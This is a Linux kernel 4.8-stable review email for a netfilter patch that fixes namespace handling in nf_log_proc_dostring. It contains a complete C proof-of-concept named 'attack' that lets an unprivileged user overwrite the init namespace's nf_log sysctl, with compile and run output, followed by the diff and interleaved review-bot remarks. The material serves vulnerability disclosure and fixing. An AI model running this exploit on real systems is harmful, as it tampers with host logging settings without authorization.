From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: linux-kernel@vger.kernel.org
Cc: Greg Kroah-Hartman <gregkh@linuxfoundation.org>,
stable@vger.kernel.org, Jann Horn <jann@thejh.net>,
Pablo Neira Ayuso <pablo@netfilter.org>
Subject: [PATCH 4.8 92/92] netfilter: fix namespace handling in nf_log_proc_dostring
Date: Thu, 17 Nov 2016 11:33:05 +0100
Message-ID: <20161117103228.609601883@linuxfoundation.org>
In-Reply-To: <20161117103224.218007793@linuxfoundation.org>
4.8-stable review patch. If anyone has any objections, please let me know.
------------------
From: Jann Horn <jann@thejh.net>
commit dbb5918cb333dfeb8897f8e8d542661d2ff5b9a0 upstream.
nf_log_proc_dostring() used current's network namespace instead of the one
corresponding to the sysctl file the write was performed on. Because the
permission check happens at open time and the nf_log files in namespaces
are accessible for the namespace owner, this can be abused by an
unprivileged user to effectively write to the init namespace's nf_log
sysctls.
Stash the "struct net *" in extra2 - data and extra1 are already used.
Repro code:
#define _GNU_SOURCE
#include <stdlib.h>
#include <sched.h>
#include <err.h>
#include <sys/mount.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>

char child_stack[1000000];
uid_t outer_uid;
gid_t outer_gid;
int stolen_fd = -1;

void writefile(char *path, char *buf) {
	int fd = open(path, O_WRONLY);
	if (fd == -1)
		err(1, "unable to open thing");
	if (write(fd, buf, strlen(buf)) != strlen(buf))
		err(1, "unable to write thing");
	close(fd);
}

int child_fn(void *p_) {
	if (mount("proc", "/proc", "proc", MS_NOSUID|MS_NODEV|MS_NOEXEC,
		  NULL))
		err(1, "mount");

	/* Yes, we need to set the maps for the net sysctls to recognize us
	 * as namespace root.
	 */
	char buf[1000];
	sprintf(buf, "0 %d 1\n", (int)outer_uid);
	writefile("/proc/1/uid_map", buf);
	writefile("/proc/1/setgroups", "deny");
	sprintf(buf, "0 %d 1\n", (int)outer_gid);
	writefile("/proc/1/gid_map", buf);

	stolen_fd = open("/proc/sys/net/netfilter/nf_log/2", O_WRONLY);
	if (stolen_fd == -1)
		err(1, "open nf_log");
	return 0;
}

int main(void) {
	outer_uid = getuid();
	outer_gid = getgid();

	int child = clone(child_fn, child_stack + sizeof(child_stack),
			  CLONE_FILES|CLONE_NEWNET|CLONE_NEWNS|CLONE_NEWPID
			  |CLONE_NEWUSER|CLONE_VM|SIGCHLD, NULL);
	if (child == -1)
		err(1, "clone");

	int status;
	if (wait(&status) != child)
		err(1, "wait");
	if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
		errx(1, "child exit status bad");

	char *data = "NONE";
	if (write(stolen_fd, data, strlen(data)) != strlen(data))
		err(1, "write");
	return 0;
}
Repro:
$ gcc -Wall -o attack attack.c -std=gnu99
$ cat /proc/sys/net/netfilter/nf_log/2
nf_log_ipv4
$ ./attack
$ cat /proc/sys/net/netfilter/nf_log/2
NONE
Because this looks like an issue with very low severity, I'm sending it to
the public list directly.
Signed-off-by: Jann Horn <jann@thejh.net>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
---
net/netfilter/nf_log.c | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
--- a/net/netfilter/nf_log.c
+++ b/net/netfilter/nf_log.c
@@ -420,7 +420,7 @@ static int nf_log_proc_dostring(struct c
char buf[NFLOGGER_NAME_LEN];
int r = 0;
int tindex = (unsigned long)table->extra1;
- struct net *net = current->nsproxy->net_ns;
+ struct net *net = table->extra2;
if (write) {
struct ctl_table tmp = *table;
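Review bot: `net` is now taken from `table->extra2` with no NULL check, so the handler depends entirely on every table entry having `extra2` populated at registration time; a `WARN_ON_ONCE(!net)` with an early `-EINVAL` return, or at least a one-line comment at this assignment stating the invariant, would make a future entry registered without `extra2` fail loudly instead of proceeding with a NULL namespace pointer. The substitution itself is the right fix: the namespace has to come from the file being written, not from `current`.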
@@ -474,7 +474,6 @@ static int netfilter_log_sysctl_init(str
3, "%d", i);
nf_log_sysctl_table[i].procname =
nf_log_sysctl_fnames[i];
- nf_log_sysctl_table[i].data = NULL;
nf_log_sysctl_table[i].maxlen = NFLOGGER_NAME_LEN;
nf_log_sysctl_table[i].mode = 0644;
nf_log_sysctl_table[i].proc_handler =
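Review bot: the deletion of `nf_log_sysctl_table[i].data = NULL;` is not mentioned in the commit message, which only describes stashing the `struct net *` in `extra2`; one sentence saying why the explicit NULL is no longer wanted (for example that the static template is already zero-initialised and the write path works on a copy) would keep this hunk from looking unrelated to the fix when someone bisects or backports it later.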
@@ -484,6 +483,9 @@ static int netfilter_log_sysctl_init(str
}
}
+ for (i = NFPROTO_UNSPEC; i < NFPROTO_NUMPROTO; i++)
+ table[i].extra2 = net;
+
net->nf.nf_log_dir_header = register_net_sysctl(net,
"net/netfilter/nf_log",
table);
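Review bot: the new loop hard-codes `NFPROTO_NUMPROTO` as the bound for `table`, whose allocation is outside this hunk; either derive the bound from the table's real size (e.g. `ARRAY_SIZE(nf_log_sysctl_table)` if that is what `table` points to or was copied from) or add a short comment above the loop stating that `extra2` must be set on every entry before `register_net_sysctl()`, since the handler in the first hunk reads `table->extra2` unconditionally and nothing here ties the two together.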